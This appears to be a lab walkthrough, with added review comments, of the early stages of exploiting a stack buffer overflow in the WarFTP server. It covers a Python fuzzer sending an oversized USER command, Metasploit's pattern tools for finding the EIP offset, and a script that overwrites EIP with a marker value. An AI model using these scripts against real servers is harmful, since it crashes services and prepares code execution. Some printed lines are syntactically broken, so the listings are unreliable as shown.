- WarFTP
- Debugger: OllyDBG
- Fuzzer for fuzzing
- Python to create the fuzzer and the exploit
Create the fuzzer file:
root@bt:~# nano fuzzer.py
#!/usr/bin/python
# fuzzer.py: opens one TCP connection to the FTP port and sends a single
# oversized USER argument, then a fixed PASS line, then disconnects.
# Python 2 shebang: the str values below are sent as raw bytes; under
# Python 3 s.send() would require bytes objects.
import socket
s=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
# 1000 copies of 0x41 ('A'). The length is the only thing varied when
# fuzzing; a USER line this long is also the obvious signature for a
# server-side length check or a log/IDS rule to key on.
buffer="\x41"*1000
# Test host and port; both are hard-coded here.
s.connect(('192.168.56.101',21))
# Consume the server banner (the value is not inspected).
data=s.recv(1024)
# NOTE(review): this print is split across two lines in the listing, which
# is a syntax error as written — presumably a line-wrap artifact of the
# page; the original is a single-line print.
print("Sending evildata via USER
Commad...")
# FTP USER command with the padded argument; CRLF terminates the line.
s.send('USER '+buffer+'\r\n')
# Reply to USER is read but not checked.
data=s.recv(1024)
s.send('PASS PASSWORD'+'\r\n')
s.close()
print("FINISH")
buffer="\x41"*1000
creates 1000 "A" characters (0x41); this will overflow the buffer.
To execute the fuzzer, first run WarFTP and choose Properties > Start
Service.
Test the connection using #nc 192.168.56.101
21
(192.168.56.101 is the local IP, 21 is the port).
Open WarFTP.
Run the OllyDbg debugger and attach it to WarFTP.
Execute the fuzzer.
Look: the EIP register is filled with the character A.
The next step is to find after how many bytes EIP is overwritten on the stack. We can use pattern_create.
Create the string pattern using pattern_create.rb:
Root@bt:/opt/metasploit/msf3/tools#
./pattern_create.rb 1000 > string_pattern.txt
Open string_pattern.txt in an editor.
Copy it and paste it into fuzzer.py in place of the buffer.
Execute the fuzzer.
Look at the debugger.
Use pattern_offset to count how many bytes into the pattern from pattern_create.rb the value sits:
EIP : 32714131
root@bt:/opt/metasploit/msf3/tools#
./pattern_offset.rb 32714131
485
ESP : q4Aq5Aq
root@bt:/opt/metasploit/msf3/tools#
./pattern_offset.rb q4Aq5Aq
493
To reach the EIP register we need 485 bytes of data;
to prove the EIP register can be overwritten at bytes 486, 487, 488 and 489 we modify fuzzer.py:
#!/usr/bin/python
# fuzzer.py, second revision: same connection sequence as before, but the
# USER argument is now a fixed-length pad followed by four marker bytes, to
# confirm the offset measured with pattern_offset.rb.
# Python 2 shebang: str values are sent as raw bytes.
import socket
s=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
# Earlier payloads kept for reference (commented out). The pattern line
# appears truncated in the listing (trailing '$'), presumably by the editor
# view the page was captured from.
#buffer="\x41"*1000
#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1A$
# "nilaiEIP" = "EIP value" (Indonesian). 485 bytes of 0x90 padding: the
# offset reported by pattern_offset.rb above.
nilaiEIP="\x90"*485
# Four marker bytes that land at positions 486-489; written low byte first,
# so a little-endian register read shows DEADBEEF if the offset is right.
nilaiEIP+="\xEF\xBE\xAD\xDE"
# Test host and port are hard-coded.
s.connect(('192.168.56.101',21))
# Server banner, read and discarded.
data=s.recv(1024)
# NOTE(review): this print is split across two lines in the listing, which
# is a syntax error as written — presumably a line-wrap artifact of the
# page; the original is a single-line print.
print("Sending evildata via USER
Commad...")
# Pad plus marker as the USER argument; total length 489 before CRLF.
s.send('USER '+nilaiEIP+'\r\n')
# Reply to USER is read but not checked.
data=s.recv(1024)
s.send('PASS PASSWORD'+'\r\n')
s.close()
print("FINISH")
Execute fuzzer.py.
Edit fuzzer.py.
Execute fuzzer.py again.